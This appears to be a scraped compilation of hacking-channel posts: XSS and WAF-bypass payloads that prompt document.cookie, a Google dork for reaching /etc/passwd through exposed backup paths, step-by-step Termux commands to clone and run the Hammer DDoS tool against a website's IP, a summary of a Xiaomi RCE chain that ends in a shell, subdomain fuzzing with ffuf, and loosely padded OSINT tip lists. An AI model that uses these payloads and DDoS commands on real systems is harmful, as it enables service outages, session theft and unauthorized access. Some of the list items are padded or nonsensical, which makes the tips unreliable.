Termux All Command [Telegram Group]

Corscan! is an innovative tool designed to analyze CORS headers and detect potential vulnerabilities in web applications. Perfect for quick checks on individual URLs or extensive batch processing. Key Features: ------------------------------------------------- -Advanced Analysis: Spot CORS vulnerabilities effectively -Customizable Bypass: Tailor origin checks and use advanced bypass methods -Fast & Efficient: Multi-threaded for rapid results ------------------------------------------------- Check it out on GitHub: https://lnkd.in/eu_6K2S2

WAF bypass payload ❗️ Payload: ">

Payload : https://InvalidURL">"onmouseover​=prompt(document.cookie)>

inurl:"home/000~ROOT~000" For Finding Backup File https://abc.xyz/home/000~ROOT~000/etc/passwd

𝐑𝐞𝐯𝐞𝐫𝐬𝐞 𝐄𝐧𝐠𝐢𝐧𝐞𝐞𝐫𝐢𝐧𝐠 𝐈𝐧𝐬𝐭𝐚𝐠𝐫𝐚𝐦 𝐔𝐬𝐞𝐫 𝐈𝐃𝐬 𝐰𝐢𝐭𝐡 𝐅𝐨𝐫𝐞𝐧𝐬𝐢𝐜 𝐎𝐒𝐈𝐍𝐓 𝐊𝐧𝐨𝐰𝐥𝐞𝐝𝐠𝐞 𝐁𝐚𝐬𝐞

30 Tips how to use OSINT for bug hunting: 1. Use Google Dorks to find vulnerabilities in web applications. 2. Use Shodan to find vulnerable IoT devices. 3. Use Whois to find information about domain names. 4. Use Maltego to visualize relationships between entities. 5. Use the Wayback Machine to find old versions of websites. 6. Use social media to gather information about targets. 7. Use LinkedIn to gather information about employees. 8. Use GitHub to find sensitive information in code repositories. 9. Use Google Alerts to monitor for mentions of your target. 10. Use DNSDumpster to map out a target's infrastructure. 11. Use Recon-ng to automate OSINT tasks. 12. Use theHarvester to gather email addresses and other information. 13. Use SpiderFoot to automate OSINT tasks and gather intelligence. 14. Use FOCA (Fingerprinting Organizations with Collected Archives) to gather metadata from documents. 15. Use VirusTotal to scan files for malware. 16. Use Censys to find vulnerable systems on the internet. 17. Use Foca Pro to extract metadata from documents and analyze it. 18. Use FOCA Online to extract metadata from documents and analyze it in the cloud. 19. Use FOCA Free Edition for basic metadata extraction from documents. 20. Use Metagoofil to extract metadata from documents and analyze it. 21. Use Datasploit for automated OSINT tasks and data mining. 22. Use Google Hacking Database (GHDB) for advanced Google searches. 23. Use Google Custom Search Engine (CSE) for targeted searches on specific websites or domains. 24. Use Google Advanced Search for advanced searches on Google. 25. Use Google Trends to monitor trends related to your target or industry. 26. Use Google Analytics to gather information about website traffic and user behavior. 27. Use Google AdWords Keyword Planner for keyword research related to your target or industry. 28. Use Google PageSpeed Insights to analyze website performance and identify vulnerabilities. 29. Use Google Search Console (formerly Webmaster Tools) for website analytics and vulnerability identification. 30. Use Google My Business for local SEO optimization.

Pentest GPT AI assistant that can run different hashtag#pentest tools. Available for free: - CVEMap - Subdomain Finder - Link Finder - WAF Detector - Whois Lookup Nuclei, SQLi Exploiter, Katana, and Linux terminal commands are available in the PRO version. https://pentestgpt.ai/

Termux Ddos Tools for Mobile $ apt update $ apt upgrade $ apt install python $ apt install git $ apt install dnsutils $ git clone https://github.com/Pavithran-R/Hammer/ Hammer need the Name Server of a website which you want to attack... To get the Name Server...just type $ nslookup example.com Note the IP Address of that Website then $ cd Hammer $ python hammer.py -s [ip Address] -t 135 example: $ python hammer.py -s 123.45.67.89 -t 135

OSINT Methods for Image Investigations https://lnkd.in/dtMXSzNm https://lnkd.in/dWUSf6fe Find similar satellite images easily. https://lnkd.in/dxzws9MA Annotate cars in satellite images https://lnkd.in/da4QpZtQ Analyze and detect shadows in images. https://lnkd.in/df9Y2Qfv Recover plaintext from pixelized screenshots. https://tineye.com/ Reverse image search for origins. https://extract.pics/ Extract images from web pages. https://fotoforensics.com/ Analyze image metadata and edits. https://lnkd.in/dWDfQSjx Detect if face image is synthetic. https://copyseeker.net/ Detect image copyright infringement. https://pimeyes.com/en Find similar faces across the web https://lnkd.in/dEBSdjkH Encode and decode hidden information in images.

RCE on Xiaomi 13 Pro (CVE-2023-26324) 👉Exploitation: 1) Open URL in WebView 2) Inject JavaScript 3) Execute JavaScript Interface functions from vulnerable GetApps to install & launch payload 4) Get shell 👉Slides with PoC: https://lnkd.in/evZkaZu8 by @Yogehi @040xZx presented at hashtag#DEFCON23

ago 🚀🚀 /Bugbounty_Roadmap | ├── /Reconnaissance │ ├── Passive_Recon │ │ ├── Google_Dorking.md │ │ ├── WHOIS_Lookups.md │ │ ├── Subdomain_Enumeration.md │ │ ├── OSINT_Tools.md │ └── Active_Recon │ ├── Port_Scanning.md │ ├── Service_Enumeration.md │ ├── Banner_Grabbing.md │ └── Directory_Bruteforcing.md │ ├── /Web_Application_Testing │ ├── /OWASP_Top_10 │ │ ├── Injection.md │ │ ├── Broken_Authentication.md │ │ ├── Sensitive_Data_Exposure.md │ │ ├── XML_External_Entities.md │ │ ├── Broken_Access_Control.md │ │ ├── https://lnkd.in/dDqJJZQH │ │ ├── Cross_Site_Scripting.md │ │ ├── https://lnkd.in/dWu6d-YG │ │ ├── https://lnkd.in/dmJSt44f │ │ └── https://lnkd.in/dtN-2Jsu │ ├── SQL_Injection │ │ ├── Overview.md │ │ ├── Union_Based.md │ │ ├── Error_Based.md │ │ └── Blind_SQLi.md │ ├── Cross_Site_Scripting │ │ ├── Overview.md │ │ ├── Stored_XSS.md │ │ ├── Reflected_XSS.md │ │ └── DOM_Based_XSS.md │ ├── https://lnkd.in/dkEmp9xB │ ├── Remote_Code_Execution.md │ ├── File_Inclusion │ │ ├── LFI.md │ │ └── RFI.md │ ├── Business_Logic_Flaws.md │ ├── IDOR.md │ └── API_Security.md │ ├── /Mobile_Application_Testing │ ├── Android_Testing │ │ ├── Static_Analysis.md │ │ ├── Dynamic_Analysis.md │ │ ├── Reverse_Engineering.md │ │ └── Common_Vulnerabilities.md │ └── iOS_Testing │ ├── Static_Analysis.md │ ├── Dynamic_Analysis.md │ ├── Reverse_Engineering.md │ └── Common_Vulnerabilities.md │ ├── /Network_Security_Testing │ ├── Network_Scanning.md │ ├── Vulnerability_Scanning.md │ ├── Exploitation.md │ └── Post_Exploitation.md │ ├── /Cloud_Security_Testing │ ├── AWS_Security.md │ ├── Azure_Security.md │ ├── GCP_Security.md │ └── Common_Vulnerabilities.md │ ├── /Tools_and_Techniques │ ├── Burp_Suite │ │ ├── Configuration.md │ │ ├── Extensions.md │ │ └── Common_Use_Cases.md │ ├── Nmap.md │ ├── Metasploit.md │ ├── Nikto.md │ ├── Gobuster.md │ ├── Sublist3r.md │ ├── ReconNG.md │ └── Other_Tools.md │ ├── /Report_Writing │ ├── Report_Template.md │ ├── https://lnkd.in/dUxPHiTQ │ ├── Impact_Assessment.md │ ├── Proof_of_Concept.md │ ├── Remediation_Advice.md │ └── Sample_Reports.md │ └── /Learning_Resources ├── Books.md ├── Blogs.md ├── Courses.md ├── Conferences.md └── CTF_Platforms.md

# Subdomain Bruteforce: └─# ffuf -u https://FUZZ-preprod[.]target[.]com -w subdomains.txt # Staging Subdomains: - FUZZ-dev.target[.]com - FUZZ-staging.target[.]com - FUZZ-preprod.target[.]com # Wordlist: https://lnkd.in/eH5P9wPs

21 of the most interesting extensions I could find. Hope these help you improve your OSINT investigations: 1. uBlock Origin - Blocks ads and trackers 2. RevEye - Reverse image search 3. Exif Viewer - View metadata 4. Wayback Machine - Access archived web pages 5. User-Agent Switcher - Modify your user-agent 6. Shodan - Retrieve website information 7. Hunchly - Capture and organize web pages 8. Cookie AutoDelete - Control cookies 9. Privacy Badger - Block tracking scripts 10. Vortimo - Analyze web content 11. Fireshot - Full web page screenshots 12. Sputnik - Search digital identifiers 13. Forensic OSINT - Full web page screenshots 14. Bot Sentinel - Detect bots on X 15. Google Translate - Translate text 16. DownThemAll - Bulk download files from websites 17. Instant Data Scraper - Extract data from web pages 18. Context Search - Quickly search highlighted text 19. Video DownloadHelper - Download videos from websites 20. ESUIT - Facebook content downloader 21. Hive AI Detector - Detect AI-generated media